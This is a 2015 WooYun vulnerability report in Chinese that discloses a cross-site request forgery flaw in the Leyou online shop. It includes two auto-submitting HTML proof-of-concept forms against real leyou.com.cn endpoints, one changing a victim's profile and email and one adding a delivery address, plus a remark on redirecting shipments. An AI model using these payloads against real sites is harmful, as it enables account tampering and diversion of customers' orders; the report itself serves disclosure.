破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

乐友网上商城可CSRF修改他人资料、收货地址

编号122927
Urlhttp://www.wooyun.org/bug.php?action=view&id=122927
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题乐友网上商城可CSRF修改他人资料、收货地址
漏洞类型CSRF
厂商乐友
白帽子jeary
提交日期2015-06-26 16:10:00
公开日期2015-07-01 16:12:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签csrf csrf利用
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank0
漏洞简介
~~
漏洞细节

POC(修改资料):

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://www.leyou.com.cn/user/leyou/ManageInfo.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="nick" value="jearyxxxx" />
<input type="hidden" name="email" value="root&#64;jeary&#46;org" />
<input type="hidden" name="code" value="&#13;" />
<input type="hidden" name="baby&#95;name" value="test" />
<input type="hidden" name="gender" value="m" />
<input type="hidden" name="year" value="2009" />
<input type="hidden" name="month" value="1" />
<input type="hidden" name="day" value="1" />
<input type="hidden" name="sbmtMod" value="¨¨&#183;¨¨?¨¬¨¢&#189;&#187;" />
<input type="hidden" name="ulogin" value="&#13;" />
<input type="hidden" name="y" value="&#13;" />
<input type="hidden" name="m" value="&#13;" />
<input type="hidden" name="d" value="&#13;" />

</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
POC2(收货地址):
<code>
<html>
<body>
<form action="http://www.leyou.com.cn/user/leyou/sub_user_address.php" method="POST">
<input type="hidden" name="revname" value="test" />
<input type="hidden" name="addr" value="å&#147;&#146;å&#147;&#146;å&#147;&#146;å&#147;&#146;å&#147;&#146;å&#147;&#146;" />
<input type="hidden" name="zip" value="000000" />
<input type="hidden" name="phone" value="13300001111" />
<input type="hidden" name="zuoji" value="072233332222" />
<input type="hidden" name="areaid" value="820100" />
<input type="hidden" name="province" value="é&#166;&#153;æ&#184;&#175;ç&#137;&#185;å&#140;º" />
<input type="hidden" name="city" value="é&#166;&#153;æ&#184;&#175;å&#178;&#155;" />
<input type="hidden" name="area" value="æ&#190;&#179;é&#151;&#168;å&#141;&#138;å&#178;&#155;" />
<input type="hidden" name="aORu" value="insert" />
<input type="hidden" name="name" value="name" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


PS:设为默认地址有一个userid和aid,如果能得到这两个,或许能把自己的地址设为默认然后发货就发到恶意修改的地址了.

POC

登录状态下访问POC即可.
地址POC虽然返回false,但是请求成功。

修复方案

token

状态信息 2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:2 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2015-07-01 16:12